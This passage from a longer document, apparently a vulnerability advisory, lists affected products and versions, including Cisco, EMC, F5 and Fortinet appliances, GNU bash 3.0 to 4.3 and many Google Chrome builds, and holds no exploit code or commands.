SecurePlatform R76 \n * Checkpoint SecurePlatform R77 \n * Checkpoint SecurePlatform R77.10 \n * Checkpoint SecurePlatform R77.20 \n * Cisco ACE Application Control Engine Module for the Cisco Catalyst 6500 \n * Cisco ASA CX and Cisco Prime Security Manager \n * Cisco ASR 1000 Series Routers \n * Cisco ASR 5000 Series \n * Cisco Access Registrar Appliance Cisco Prime Access Registrar Applianc \n * Cisco Application and Content Networking System (ACNS) \n * Cisco AutoBackup Server \n * Cisco Business Edition 3000 \n * Cisco Catalyst 6500 \n * Cisco Cisco ASA CX \n * Cisco Cisco Application Control Engine ACE 4710 \n * Cisco Cisco Application Control Engine ACE30 \n * Cisco Cisco Application Policy Infrastructure Controller \n * Cisco Cisco Clean Access Manager \n * Cisco Cisco Cloud Services \n * Cisco Cisco Edge 300 Digital Media Player \n * Cisco Cisco Intrusion Prevention System Solutions (IPS) \n * Cisco Cisco IronPort Encryption Appliance (IEA) \n * Cisco Cisco Life Cycle Management (LCM) \n * Cisco Cisco NAC Server \n * Cisco Cisco NetAuthenticate \n * Cisco Cisco Network Convergence System 6000 Series Routers 5.0.0 \n * Cisco Cisco Nexus 1000V InterCloud for VMware \n * Cisco Cisco Nexus 9000 \n * Cisco Cisco Nexus 9K \n * Cisco Cisco Show and Share 5(2) \n * Cisco Cisco Smart Care \n * Cisco Cisco TelePresence Video Communication Server Expressway \n * Cisco Cisco Telepresence endpoints 10\" touch panel \n * Cisco Cisco Telepresence endpoints C series \n * Cisco Cisco Telepresence endpoints EX series \n * Cisco Cisco Telepresence endpoints MX series \n * Cisco Cisco Telepresence endpoints MXG2 series \n * Cisco Cisco Telepresence endpoints SX series \n * Cisco Cisco UCS B-Series (Blade) Servers \n * Cisco Cisco UCS Central \n * Cisco Cisco Unified Computing System B-Series (Blade) Servers \n * Cisco Cisco Virtual PGW 2200 Softswitch \n * Cisco Cisco WebEx Node \n * Cisco D9036 Modular Encoding Platform \n * Cisco DC Health Check \n * Cisco Data Center Analytics Framework (DCAF) \n * Cisco Digital Media Manager (DMM) 5.0 \n * Cisco Digital Media Manager (DMM) \n * Cisco Digital Media Players \n * Cisco Download Server (DLS) (RH Based) \n * Cisco Edge 300 Digital Media Player \n * Cisco Edge 340 Digital Media Player \n * Cisco Emergency Responder 1.1.0 \n * Cisco Enterprise Content Delivery Service \n * Cisco Fibre Channel switches \n * Cisco Finesse \n * Cisco GSS 4492R Global Site Selector \n * Cisco Hosted Collaboration Mediation Fulfillment (HCM-F) \n * Cisco IM and Presence Service (CUPS) \n * Cisco IOS 15.4(1)S \n * Cisco IOS 15.4S \n * Cisco IOS \n * Cisco IOS-XE for ASR1k \n * Cisco IOS-XE for ASR903 \n * Cisco IOS-XE for CSR1000v \n * Cisco IOS-XE for Catalyst 3k \n * Cisco IOS-XE for Catalyst 4k \n * Cisco IOS-XE for Catalyst AIR-CT5760 \n * Cisco IOS-XE for ISR4400 \n * Cisco IOS-XR \n * Cisco IP Interoperability and Collaboration System (IPICS) \n * Cisco Identity Services Engine (ISE) \n * Cisco Identity Services Engine \n * Cisco Intelligent Automation for Cloud \n * Cisco Local Collector Appliance (LCA) \n * Cisco MDS 9000 \n * Cisco MDS \n * Cisco MXE Series \n * Cisco Media Experience Engine (MXE) \n * Cisco Media Experience Engines (MXE) \n * Cisco MediaSense \n * Cisco NAC Appliance \n * Cisco Nac Guest Server \n * Cisco NetFlow Collection Agent \n * Cisco Network Analysis Module \n * Cisco Network Configuration and Change Management \n * Cisco Network Convergence System (NCS) 6000 \n * Cisco Network Performance Analytics (NPA) \n * Cisco Nexus 1000 Virtual Supervisor Module (VSM) \n * Cisco Nexus 1000V \n * Cisco Nexus 1000V Switch for Nexus 3000 Series 5.0(3)U1(1) \n * Cisco Nexus 1000V Switch for Nexus 4000 Series 4.1(2)E1(1) \n * Cisco Nexus 1000V Switch for Nexus 5000 Series 4.0(0)N1(1a) \n * Cisco Nexus 1000V Switch for Nexus 7000 Series 4.1.(2) \n * Cisco Nexus 1010 \n * Cisco Nexus 3000 \n * Cisco Nexus 4000 \n * Cisco Nexus 5000 \n * Cisco Nexus 6000 \n * Cisco Nexus 7000 \n * Cisco Nexus 7000 Series Switches \n * Cisco Nexus 9000 running NxOS \n * Cisco OnePK All-in-One VM \n * Cisco Paging Server (Informacast) \n * Cisco Paging Server \n * Cisco Physical Access Gateway \n * Cisco Physical Access Manager \n * Cisco PowerVu D9190 Conditional Access Manager (PCAM) \n * Cisco Prime Collaboration Assurance \n * Cisco Prime Collaboration Deployment \n * Cisco Prime Collaboration Provisioning \n * Cisco Prime IP Express \n * Cisco Prime Infrastructure - \n * Cisco Prime Infrastructure 1.2.1 \n * Cisco Prime LAN Management Solution \n * Cisco Prime License Manager \n * Cisco Prime Network Services Controller (PNSC) \n * Cisco Prime Service Catalog Virtual Appliance \n * Cisco Proactive Network Operations Center \n * Cisco Quantum SON Suite \n * Cisco Quantum Virtualized Packet Core \n * Cisco Secure Access Control Server (ACS) \n * Cisco Secure Access Control Server \n * Cisco Service Control Engine 1010 \n * Cisco Service Control Engine 8000 \n * Cisco Services Provisioning Platform (SPP) \n * Cisco Show and Share (SnS) \n * Cisco SocialMiner \n * Cisco Standalone rack server CIMC \n * Cisco Tandberg Codian ISDN GW 3210 \n * Cisco Tandberg Codian ISDN GW 3220 \n * Cisco Tandberg Codian ISDN GW 3240 \n * Cisco Tandberg Codian MSE 8320 model \n * Cisco TelePresence 1310 \n * Cisco TelePresence Conductor \n * Cisco TelePresence Exchange System (CTX) \n * Cisco TelePresence IP Gateway Series \n * Cisco TelePresence IP VCR Series \n * Cisco TelePresence ISDN GW 3241 \n * Cisco TelePresence ISDN GW MSE 8321 \n * Cisco TelePresence ISDN Link \n * Cisco TelePresence Manager (CTSMan) \n * Cisco TelePresence Multipoint Switch \n * Cisco TelePresence Recording Server (CTRS) \n * Cisco TelePresence System 1000 \n * Cisco TelePresence System 1100 \n * Cisco TelePresence System 1300 \n * Cisco TelePresence System 3000 Series \n * Cisco TelePresence System 500-32 \n * Cisco TelePresence System 500-37 \n * Cisco TelePresence TE Software (for E20 - EoL) \n * Cisco TelePresence TE Software \n * Cisco TelePresence TX 9000 Series \n * Cisco TelePresence Video Communication Server (VCS) \n * Cisco TelePresence Video Communication Server (VCS/Expressway) \n * Cisco UCS Director \n * Cisco UCS Invicta Appliance \n * Cisco USC Invicta Series Autosupport Portal \n * Cisco Unified Communications Domain Manager \n * Cisco Unified Communications Manager (CUCM) \n * Cisco Unified Communications Manager (UCM) \n * Cisco Unified Communications Manager Session Management Edition (SME) \n * Cisco Unified Computing System (UCS) \n * Cisco Unified Contact Center Express (UCCX) \n * Cisco Unified Contact Center Express \n * Cisco Unified IP Phone \n * Cisco Unified Intelligence Center (CUIC) \n * Cisco Unified Intelligence Center \n * Cisco Unified Presence Server \n * Cisco Unity Connection (UC) \n * Cisco Unity Connection \n * Cisco Universal Small Cell CloudBase \n * Cisco VDS Service Broker \n * Cisco Video Distribution Suite for Internet Streaming VDS-IS \n * Cisco Video Surveillance Media Server \n * Cisco Videoscape Conductor \n * Cisco Videoscape Distribution Suite Transparent Caching \n * Cisco Virtual Security Gateway for Microsoft Hyper-V \n * Cisco Virtualization Experience Client 6215 \n * Cisco Visual Quality Experience Server \n * Cisco Visual Quality Experience Tools Server \n * Cisco Web Element Manager \n * Cisco WebEx Meetings Server (CWMS) \n * Cisco WebEx PCNow \n * Cisco Wide Area Application Services (WAAS) \n * Cisco Wireless Lan Controller (WLC) \n * Computer Associates API Management \n * Computer Associates Application Performance Management \n * Computer Associates Application Performance Management Cloud Monitor \n * Computer Associates Customer Experience Manager (CEM) Transaction Impact Monitor \n * Computer Associates Layer 7 API Gateway \n * Computer Associates Layer 7 API Management Portal \n * Computer Associates Layer 7 Mobile Access Gateway \n * Computer Associates User Activity Reporting Module (Enterprise Log Manager) \n * Debian Linux 6.0 amd64 \n * Debian Linux 6.0 arm \n * Debian Linux 6.0 ia-32 \n * Debian Linux 6.0 ia-64 \n * Debian Linux 6.0 mips \n * Debian Linux 6.0 powerpc \n * Debian Linux 6.0 s/390 \n * Debian Linux 6.0 sparc \n * Digi ConnectPort LTS \n * Digi Digi CM \n * Digi Digi Passport \n * EMC Avamar 4.1 \n * EMC Avamar 4.1.0-1470 \n * EMC Avamar 4.1.1 \n * EMC Avamar 4.1.1-340 \n * EMC Avamar 4.1.2 \n * EMC Avamar 4.1.2-33 \n * EMC Avamar 5.0 \n * EMC Avamar 5.0 SP1 \n * EMC Avamar 5.0 SP2 \n * EMC Avamar 5.0.0-407 \n * EMC Avamar 5.0.1 \n * EMC Avamar 5.0.1-32 \n * EMC Avamar 5.0.2 \n * EMC Avamar 5.0.2-41 \n * EMC Avamar 5.0.3 \n * EMC Avamar 5.0.3-29 \n * EMC Avamar 5.0.4 \n * EMC Avamar 5.0.4-26 \n * EMC Avamar 6.0 \n * EMC Avamar 6.0.1 \n * EMC Avamar 6.0.2 \n * EMC Avamar 6.0.3 \n * EMC Avamar 6.1 \n * EMC Avamar 6.1.1 \n * EMC Avamar 6.1.1-87 \n * EMC Avamar 6.1.100-333 \n * EMC Avamar 6.1.100-402 \n * EMC Avamar 6.1.101-89 \n * EMC Avamar Server 5.0 \n * EMC Avamar Server 6.0 \n * EMC Avamar Server 7.0 \n * EMC Celerra \n * EMC Isilon OneFS \n * EMC Kazeon 4.7 \n * EMC Kazeon 4.8 \n * EMC Supplier Exchange \n * EMC VNX1 \n * EMC VNX2 \n * EMC VNXe 3200 \n * EMC VNXe \n * EMC VPLEX \n * EMC VPLEX-VE \n * F5 ARX 6.0.0 \n * F5 ARX 6.1.0 \n * F5 ARX 6.1.1 \n * F5 ARX 6.2.0 \n * F5 ARX 6.3.0 \n * F5 ARX 6.4.0 \n * F5 BIG-IP AAM 11.4.0 \n * F5 BIG-IP AAM 11.4.1 \n * F5 BIG-IP AAM 11.5.0 \n * F5 BIG-IP AAM 11.5.1 \n * F5 BIG-IP AAM 11.6.0 \n * F5 BIG-IP AFM 11.2.1 \n * F5 BIG-IP AFM 11.3.0 \n * F5 BIG-IP AFM 11.4.1 \n * F5 BIG-IP AFM 11.5.0 \n * F5 BIG-IP AFM 11.5.1 \n * F5 BIG-IP AFM 11.6.0 \n * F5 BIG-IP APM 10.0.0 \n * F5 BIG-IP APM 10.1 \n * F5 BIG-IP APM 10.2.1 \n * F5 BIG-IP APM 10.2.2 \n * F5 BIG-IP APM 10.2.4 \n * F5 BIG-IP APM 11.0.0 \n * F5 BIG-IP APM 11.1.0 \n * F5 BIG-IP APM 11.2.0 \n * F5 BIG-IP APM 11.2.1 \n * F5 BIG-IP APM 11.3.0 \n * F5 BIG-IP APM 11.4.0 \n * F5 BIG-IP APM 11.4.1 \n * F5 BIG-IP APM 11.5.0 \n * F5 BIG-IP APM 11.5.1 \n * F5 BIG-IP APM 11.6.0 \n * F5 BIG-IP ASM 10.0.0 \n * F5 BIG-IP ASM 10.2.1 \n * F5 BIG-IP ASM 10.2.2 \n * F5 BIG-IP ASM 10.2.4 \n * F5 BIG-IP ASM 11.0.0 \n * F5 BIG-IP ASM 11.1.0 \n * F5 BIG-IP ASM 11.2.0 \n * F5 BIG-IP ASM 11.2.1 \n * F5 BIG-IP ASM 11.3.0 \n * F5 BIG-IP ASM 11.4.1 \n * F5 BIG-IP ASM 11.5.0 \n * F5 BIG-IP ASM 11.5.1 \n * F5 BIG-IP ASM 11.6.0 \n * F5 BIG-IP Analytics 11.0.0 \n * F5 BIG-IP Analytics 11.1.0 \n * F5 BIG-IP Analytics 11.2.0 \n * F5 BIG-IP Analytics 11.2.1 \n * F5 BIG-IP Analytics 11.3.0 \n * F5 BIG-IP Analytics 11.4.1 \n * F5 BIG-IP Analytics 11.5.0 \n * F5 BIG-IP Analytics 11.5.1 \n * F5 BIG-IP Analytics 11.6.0 \n * F5 BIG-IP Edge Gateway 10.1.0 \n * F5 BIG-IP Edge Gateway 10.2.1 \n * F5 BIG-IP Edge Gateway 10.2.2 \n * F5 BIG-IP Edge Gateway 10.2.4 \n * F5 BIG-IP Edge Gateway 11.0.0 \n * F5 BIG-IP Edge Gateway 11.1.0 \n * F5 BIG-IP Edge Gateway 11.2.0 \n * F5 BIG-IP Edge Gateway 11.2.1 \n * F5 BIG-IP Edge Gateway 11.3.0 \n * F5 BIG-IP Edge Gateway 11.4.1 \n * F5 BIG-IP Edge Gateway 11.5.0 \n * F5 BIG-IP Edge Gateway 11.5.1 \n * F5 BIG-IP LTM 10.0.0 \n * F5 BIG-IP LTM 10.2.1 \n * F5 BIG-IP LTM 10.2.2 \n * F5 BIG-IP LTM 10.2.4 \n * F5 BIG-IP LTM 11.0.0 \n * F5 BIG-IP LTM 11.1.0 \n * F5 BIG-IP LTM 11.2.0 \n * F5 BIG-IP LTM 11.2.1 \n * F5 BIG-IP LTM 11.3.0 \n * F5 BIG-IP LTM 11.4.1 \n * F5 BIG-IP LTM 11.5 \n * F5 BIG-IP LTM 11.5.0 \n * F5 BIG-IP LTM 11.5.1 \n * F5 BIG-IP LTM 11.6.0 \n * F5 BIG-IP Link Controller 10.0.0 \n * F5 BIG-IP Link Controller 10.2.1 \n * F5 BIG-IP Link Controller 10.2.2 \n * F5 BIG-IP Link Controller 10.2.4 \n * F5 BIG-IP Link Controller 11.0.0 \n * F5 BIG-IP Link Controller 11.1.0 \n * F5 BIG-IP Link Controller 11.2.0 \n * F5 BIG-IP Link Controller 11.2.1 \n * F5 BIG-IP Link Controller 11.3.0 \n * F5 BIG-IP Link Controller 11.4.1 \n * F5 BIG-IP Link Controller 11.5.0 \n * F5 BIG-IP Link Controller 11.5.1 \n * F5 BIG-IP Link Controller 11.6.0 \n * F5 BIG-IP PEM 11.3.0 \n * F5 BIG-IP PEM 11.4.1 \n * F5 BIG-IP PEM 11.5.0 \n * F5 BIG-IP PEM 11.5.1 \n * F5 BIG-IP PEM 11.6.0 \n * F5 BIG-IP PSM 10.0.0 \n * F5 BIG-IP PSM 10.2.1 \n * F5 BIG-IP PSM 10.2.4 \n * F5 BIG-IP PSM 11.0.0 \n * F5 BIG-IP PSM 11.1.0 \n * F5 BIG-IP PSM 11.2.0 \n * F5 BIG-IP PSM 11.2.1 \n * F5 BIG-IP PSM 11.3.0 \n * F5 BIG-IP PSM 11.4.1 \n * F5 BIG-IP PSM 11.5.0 \n * F5 BIG-IP PSM 11.5.1 \n * F5 BIG-IP WOM 10.0.0 \n * F5 BIG-IP WOM 10.2.1 \n * F5 BIG-IP WOM 10.2.2 \n * F5 BIG-IP WOM 10.2.4 \n * F5 BIG-IP WOM 11.0.0 \n * F5 BIG-IP WOM 11.1.0 \n * F5 BIG-IP WOM 11.2.0 \n * F5 BIG-IP WOM 11.2.1 \n * F5 BIG-IP WOM 11.3.0 \n * F5 BIG-IP WOM 11.5.1 \n * F5 BIG-IP WebAccelerator 10.0.0 \n * F5 BIG-IP WebAccelerator 10.2.1 \n * F5 BIG-IP WebAccelerator 10.2.4 \n * F5 BIG-IP WebAccelerator 11.0.0 \n * F5 BIG-IP WebAccelerator 11.1.0 \n * F5 BIG-IP WebAccelerator 11.2.0 \n * F5 BIG-IP WebAccelerator 11.2.1 \n * F5 BIG-IP WebAccelerator 11.3.0 \n * F5 BIG-IP WebAccelerator 11.5.1 \n * F5 BIG-IQ Cloud 4.0.0 \n * F5 BIG-IQ Cloud 4.1.0 \n * F5 BIG-IQ Cloud 4.2.0 \n * F5 BIG-IQ Cloud 4.3.0 \n * F5 BIG-IQ Device 4.2.0 \n * F5 BIG-IQ Device 4.3.0 \n * F5 BIG-IQ Security 4.0.0 \n * F5 BIG-IQ Security 4.1.0 \n * F5 BIG-IQ Security 4.2.0 \n * F5 BIG-IQ Security 4.3.0 \n * F5 Enterprise Manager 2.1.0 \n * F5 Enterprise Manager 2.3.0 \n * F5 Enterprise Manager 3.0.0 \n * F5 Enterprise Manager 3.1.0 \n * F5 Enterprise Manager 3.1.1 \n * F5 Traffix SDC 3.3.2 \n * F5 Traffix SDC 3.4.1 \n * F5 Traffix SDC 3.5.1 \n * F5 Traffix SDC 4.0.0 \n * F5 Traffix SDC 4.0.5 \n * F5 Traffix SDC 4.1.0 \n * Fedoraproject Fedora 19 \n * Fedoraproject Fedora 20 \n * Fedoraproject Fedora 21 \n * Fortinet AscenLink 7.0 \n * Fortinet AscenLink 7.1-B5599 \n * Fortinet AscenLink 7.1-B5745 \n * Fortinet FortiAnalyzer 5.0.4 \n * Fortinet FortiAnalyzer 5.0.5 \n * Fortinet FortiAnalyzer 5.0.7 \n * Fortinet FortiAnalyzer 5.2.0 \n * Fortinet FortiAuthenticator \n * Fortinet FortiDB \n * Fortinet FortiManager 4.3 \n * Fortinet FortiManager 5.0.7 \n * Fortinet FortiManager 5.2.0 \n * GNU GNU bash 3.0 \n * GNU GNU bash 3.0.16 \n * GNU GNU bash 3.00.0(2) \n * GNU GNU bash 3.1 \n * GNU GNU bash 3.2 \n * GNU GNU bash 3.2.48 \n * GNU GNU bash 4.0 \n * GNU GNU bash 4.0 RC1 \n * GNU GNU bash 4.1 \n * GNU GNU bash 4.2 \n * GNU GNU bash 4.3 \n * Gentoo Linux \n * Google Chrome 0.1.38.1 \n * Google Chrome 0.1.38.2 \n * Google Chrome 0.1.38.4 \n * Google Chrome 0.1.40.1 \n * Google Chrome 0.1.42.2 \n * Google Chrome 0.1.42.3 \n * Google Chrome 0.2.149.27 \n * Google Chrome 0.2.149.29 \n * Google Chrome 0.2.149.30 \n * Google Chrome 0.2.152.1 \n * Google Chrome 0.2.153.1 \n * Google Chrome 0.3.154 9 \n * Google Chrome 0.3.154.0 \n * Google Chrome 0.3.154.3 \n * Google Chrome 0.4.154.18 \n * Google Chrome 0.4.154.22 \n * Google Chrome 0.4.154.31 \n * Google Chrome 0.4.154.33 \n * Google Chrome 1.0.154.36 \n * Google Chrome 1.0.154.39 \n * Google Chrome 1.0.154.42 \n * Google Chrome 1.0.154.43 \n * Google Chrome 1.0.154.46 \n * Google Chrome 1.0.154.48 \n * Google Chrome 1.0.154.52 \n * Google Chrome 1.0.154.53 \n * Google Chrome 1.0.154.55 \n * Google Chrome 1.0.154.59 \n * Google Chrome 1.0.154.61 \n * Google Chrome 1.0.154.64 \n * Google Chrome 1.0.154.65 \n * Google Chrome 10 \n * Google Chrome 10.0.601.0 \n * Google Chrome 10.0.602.0 \n * Google Chrome 10.0.603.0 \n * Google Chrome 10.0.603.2 \n * Google Chrome 10.0.603.3 \n * Google Chrome 10.0.604.0 \n * Google Chrome 10.0.605.0 \n * Google Chrome 10.0.606.0 \n * Google Chrome 10.0.607.0 \n * Google Chrome 10.0.608.0 \n * Google Chrome 10.0.609.0 \n * Google Chrome 10.0.610.0 \n * Google Chrome 10.0.611.0 \n * Google Chrome 10.0.611.1 \n * Google Chrome 10.0.612.0 \n * Google Chrome 10.0.612.1 \n * Google Chrome 10.0.612.2 \n * Google Chrome 10.0.612.3 \n * Google Chrome 10.0.613.0 \n * Google Chrome 10.0.614.0 \n * Google Chrome 10.0.615.0 \n * Google Chrome 10.0.616.0 \n * Google Chrome 10.0.617.0 \n * Google Chrome 10.0.618.0 \n * Google Chrome 10.0.619.0 \n * Google Chrome 10.0.620.0 \n * Google Chrome 10.0.621.0 \n * Google Chrome 10.0.622.0 \n * Google Chrome 10.0.622.1 \n * Google Chrome 10.0.623.0 \n * Google Chrome 10.0.624.0 \n * Google Chrome 10.0.625.0 \n * Google Chrome 10.0.626.0 \n * Google Chrome 10.0.627.0 \n * Google Chrome 10.0.628.0 \n * Google Chrome 10.0.629.0 \n * Google Chrome 10.0.630.0 \n * Google Chrome 10.0.631.0 \n * Google Chrome 10.0.632.0 \n * Google Chrome 10.0.633.0 \n * Google Chrome 10.0.634.0 \n * Google Chrome 10.0.634.1 \n * Google Chrome 10.0.635.0 \n * Google Chrome 10.0.636.0 \n * Google Chrome 10.0.638.0 \n * Google Chrome 10.0.638.1 \n * Google Chrome 10.0.639.0 \n * Google Chrome 10.0.640.0 \n * Google Chrome 10.0.642.0 \n * Google Chrome 10.0.642.1 \n * Google Chrome 10.0.642.2 \n * Google Chrome 10.0.643.0 \n * Google Chrome 10.0.644.0 \n * Google Chrome 10.0.645.0 \n * Google Chrome 10.0.646.0 \n * Google Chrome 10.0.647.0 \n * Google Chrome 10.0.648.0 \n * Google Chrome 10.0.648.1 \n * Google Chrome 10.0.648.10 \n * Google Chrome 10.0.648.101 \n * Google Chrome 10.0.648.103 \n * Google Chrome 10.0.648.105 \n * Google Chrome 10.0.648.107 \n * Google Chrome 10.0.648.11 \n * Google Chrome 10.0.648.114 \n * Google Chrome 10.0.648.116 \n * Google Chrome 10.0.648.118 \n * Google Chrome 10.0.648.119 \n * Google Chrome 10.0.648.12 \n * Google Chrome 10.0.648.120 \n * Google Chrome 10.0.648.121 \n * Google Chrome 10.0.648.122 \n * Google Chrome 10.0.648.123 \n * Google Chrome 10.0.648.124 \n * Google Chrome 10.0.648.125 \n * Google Chrome 10.0.648.126 \n * Google Chrome 10.0.648.127 \n * Google Chrome 10.0.648.128 \n * Google Chrome 10.0.648.129 \n * Google Chrome 10.0.648.13 \n * Google Chrome 10.0.648.130 \n * Google Chrome 10.0.648.131 \n * Google Chrome 10.0.648.132 \n * Google Chrome 10.0.648.133 \n * Google Chrome 10.0.648.134 \n * Google Chrome 10.0.648.135 \n * Google Chrome 10.0.648.151 \n * Google Chrome 10.0.648.18 \n * Google Chrome 10.0.648.2 \n * Google Chrome 10.0.648.201 \n * Google Chrome 10.0.648.203 \n * Google Chrome 10.0.648.204 \n * Google Chrome 10.0.648.205 \n * Google Chrome 10.0.648.23 \n * Google Chrome 10.0.648.26 \n * Google Chrome 10.0.648.28 \n * Google Chrome 10.0.648.3 \n * Google Chrome 10.0.648.32 \n * Google Chrome 10.0.648.35 \n * Google Chrome 10.0.648.38 \n * Google Chrome 10.0.648.4 \n * Google Chrome 10.0.648.42 \n * Google Chrome 10.0.648.45 \n * Google Chrome 10.0.648.49 \n * Google Chrome 10.0.648.5 \n * Google Chrome 10.0.648.54 \n * Google Chrome 10.0.648.56 \n * Google Chrome 10.0.648.59 \n * Google Chrome 10.0.648.6 \n * Google Chrome 10.0.648.62 \n * Google Chrome 10.0.648.66 \n * Google Chrome 10.0.648.68 \n * Google Chrome 10.0.648.7 \n * Google Chrome 10.0.648.70 \n * Google Chrome 10.0.648.72 \n * Google Chrome 10.0.648.76 \n * Google Chrome 10.0.648.79 \n * Google Chrome 10.0.648.8 \n * Google Chrome 10.0.648.82 \n * Google Chrome 10.0.648.84 \n * Google Chrome 10.0.648.87 \n * Google Chrome 10.0.648.9 \n * Google Chrome 10.0.648.90 \n * Google Chrome 10.0.649.0 \n * Google Chrome 10.0.650.0 \n * Google Chrome 10.0.651.0 \n * Google Chrome 11 \n * Google Chrome 11.0.652.0 \n * Google Chrome 11.0.653.0 \n * Google Chrome 11.0.654.0 \n * Google Chrome 11.0.655.0 \n * Google Chrome 11.0.656.0 \n * Google Chrome 11.0.657.0 \n * Google Chrome 11.0.658.0 \n * Google Chrome 11.0.658.1 \n * Google Chrome 11.0.659.0 \n * Google Chrome 11.0.660.0 \n * Google Chrome 11.0.661.0 \n * Google Chrome 11.0.662.0 \n * Google Chrome 11.0.663.0 \n * Google Chrome 11.0.664.1 \n * Google Chrome 11.0.665.0 \n * Google Chrome 11.0.666.0 \n * Google Chrome 11.0.667.0 \n * Google Chrome 11.0.667.2 \n * Google Chrome 11.0.667.3 \n * Google Chrome 11.0.667.4 \n * Google Chrome 11.0.668.0 \n * Google Chrome 11.0.669.0 \n * Google Chrome 11.0.670.0 \n * Google Chrome 11.0.671.0 \n * Google Chrome 11.0.672.0 \n * Google Chrome 11.0.672.1 \n * Google Chrome 11.0.672.2 \n * Google Chrome 11.0.673.0 \n * Google Chrome 11.0.674.0 \n * Google Chrome 11.0.675.0 \n * Google Chrome 11.0.676.0 \n * Google Chrome 11.0.677.0 \n * Google Chrome 11.0.678.0 \n * Google Chrome 11.0.679.0 \n * Google Chrome 11.0.680.0 \n * Google Chrome 11.0.681.0 \n * Google Chrome 11.0.682.0 \n * Google Chrome 11.0.683.0 \n * Google Chrome 11.0.684.0 \n * Google Chrome 11.0.685.0 \n * Google Chrome 11.0.686.0 \n * Google Chrome 11.0.686.1 \n * Google Chrome 11.0.686.2 \n * Google Chrome 11.0.686.3 \n * Google Chrome 11.0.687.0 \n * Google Chrome 11.0.687.1 \n * Google Chrome 11.0.688.0 \n * Google Chrome 11.0.689.0 \n * Google Chrome 11.0.690.0 \n * Google Chrome 11.0.690.1 \n * Google Chrome 11.0.691.0 \n * Google Chrome 11.0.692.0 \n * Google Chrome 11.0.693.0 \n * Google Chrome 11.0.694.0 \n * Google Chrome 11.0.695.0 \n * Google Chrome 11.0.696.0 \n * Google Chrome 11.0.696.1 \n * Google Chrome 11.0.696.10 \n * Google Chrome 11.0.696.11 \n * Google Chrome 11.0.696.12 \n * Google Chrome 11.0.696.13 \n * Google Chrome 11.0.696.14 \n * Google Chrome 11.0.696.15 \n * Google Chrome 11.0.696.16 \n * Google Chrome 11.0.696.17 \n * Google Chrome 11.0.696.18 \n * Google Chrome 11.0.696.19 \n * Google Chrome 11.0.696.2 \n * Google Chrome 11.0.696.20 \n * Google Chrome 11.0.696.21 \n * Google Chrome 11.0.696.22 \n * Google Chrome 11.0.696.23 \n * Google Chrome 11.0.696.24 \n * Google Chrome 11.0.696.25 \n * Google Chrome 11.0.696.26 \n * Google Chrome 11.0.696.27 \n * Google Chrome 11.0.696.28 \n * Google Chrome 11.0.696.29 \n * Google Chrome 11.0.696.3 \n * Google Chrome 11.0.696.30 \n * Google Chrome 11.0.696.31 \n * Google Chrome 11.0.696.32 \n * Google Chrome 11.0.696.33 \n * Google Chrome 11.0.696.34 \n * Google Chrome 11.0.696.35 \n * Google Chrome 11.0.696.36 \n * Google Chrome 11.0.696.37 \n * Google Chrome 11.0.696.38 \n * Google Chrome 11.0.696.39 \n * Google Chrome 11.0.696.4 \n * Google Chrome 11.0.696.40 \n * Google Chrome 11.0.696.41 \n * Google Chrome 11.0.696.42 \n * Google Chrome 11.0.696.43 \n * Google Chrome 11.0.696.44 \n * Google Chrome 11.0.696.45 \n * Google Chrome 11.0.696.46 \n * Google Chrome 11.0.696.47 \n * Google Chrome 11.0.696.48 \n * Google Chrome 11.0.696.49 \n * Google Chrome 11.0.696.5 \n * Google Chrome 11.0.696.50 \n * Google Chrome 11.0.696.51 \n * Google Chrome 11.0.696.52 \n * Google Chrome 11.0.696.53 \n * Google Chrome 11.0.696.54 \n * Google Chrome 11.0.696.55 \n * Google Chrome 11.0.696.56 \n * Google Chrome 11.0.696.57 \n * Google Chrome 11.0.696.58 \n * Google Chrome 11.0.696.59 \n * Google Chrome 11.0.696.60 \n * Google Chrome 11.0.696.61 \n * Google Chrome 11.0.696.62 \n * Google Chrome 11.0.696.63 \n * Google Chrome 11.0.696.64 \n * Google Chrome 11.0.696.65 \n * Google Chrome 11.0.696.66 \n * Google Chrome 11.0.696.67 \n * Google Chrome 11.0.696.68 \n * Google Chrome 11.0.696.69 \n * Google Chrome 11.0.696.7 \n * Google Chrome 11.0.696.70 \n * Google Chrome 11.0.696.71 \n * Google Chrome 11.0.696.72 \n * Google Chrome 11.0.696.77 \n * Google Chrome 11.0.696.8 \n * Google Chrome 11.0.696.9 \n * Google Chrome 11.0.697.0 \n * Google Chrome 11.0.698.0 \n * Google Chrome 11.0.699.0 \n * Google Chrome 12 \n * Google Chrome 12.0.700.0 \n * Google Chrome 12.0.701.0 \n * Google Chrome 12.0.702.0 \n * Google Chrome 12.0.702.1 \n * Google Chrome 12.0.702.2 \n * Google Chrome 12.0.703.0 \n * Google Chrome 12.0.704.0 \n * Google Chrome 12.0.705.0 \n * Google Chrome 12.0.706.0 \n * Google Chrome 12.0.707.0 \n * Google Chrome 12.0.708.0 \n * Google Chrome 12.0.709.0 \n * Google Chrome 12.0.710.0 \n * Google Chrome 12.0.711.0 \n * Google Chrome 12.0.712.0 \n * Google Chrome 12.0.713.0 \n * Google Chrome 12.0.714.0 \n * Google Chrome 12.0.715.0 \n * Google Chrome 12.0.716.0 \n * Google Chrome 12.0.717.0 \n * Google Chrome 12.0.718.0 \n * Google Chrome 12.0.719.0 \n * Google Chrome 12.0.719.1 \n * Google Chrome 12.0.720.0 \n * Google Chrome 12.0.721.0 \n * Google Chrome 12.0.721.1 \n * Google Chrome 12.0.722.0 \n * Google Chrome 12.0.723.0 \n * Google Chrome 12.0.723.1 \n * Google Chrome 12.0.724.0 \n * Google Chrome 12.0.725.0 \n * Google Chrome 12.0.726.0 \n * Google Chrome 12.0.727.0 \n * Google Chrome 12.0.728.0 \n * Google Chrome 12.0.729.0 \n * Google Chrome 12.0.730.0 \n * Google Chrome 12.0.731.0 \n * Google Chrome 12.0.732.0 \n * Google Chrome 12.0.733.0 \n * Google Chrome 12.0.734.0 \n * Google Chrome 12.0.735.0 \n * Google Chrome 12.0.736.0 \n * Google Chrome 12.0.737.0 \n * Google Chrome 12.0.738.0 \n * Google Chrome 12.0.739.0 \n * Google Chrome 12.0.740.0 \n * Google Chrome 12.0.741.0 \n * Google Chrome 12.0.742.0 \n * Google Chrome 12.0.742.1 \n * Google Chrome 12.0.742.10 \n * Google Chrome 12.0.742.100 \n * Google Chrome 12.0.742.105 \n * Google Chrome 12.0.742.11 \n * Google Chrome 12.0.742.111 \n * Google Chrome 12.0.742.112 \n * Google Chrome 12.0.742.113 \n * Google Chrome 12.0.742.114 \n * Google Chrome 12.0.742.115 \n * Google Chrome 12.0.742.12 \n * Google Chrome 12.0.742.120 \n * Google Chrome 12.0.742.121 \n * Google Chrome 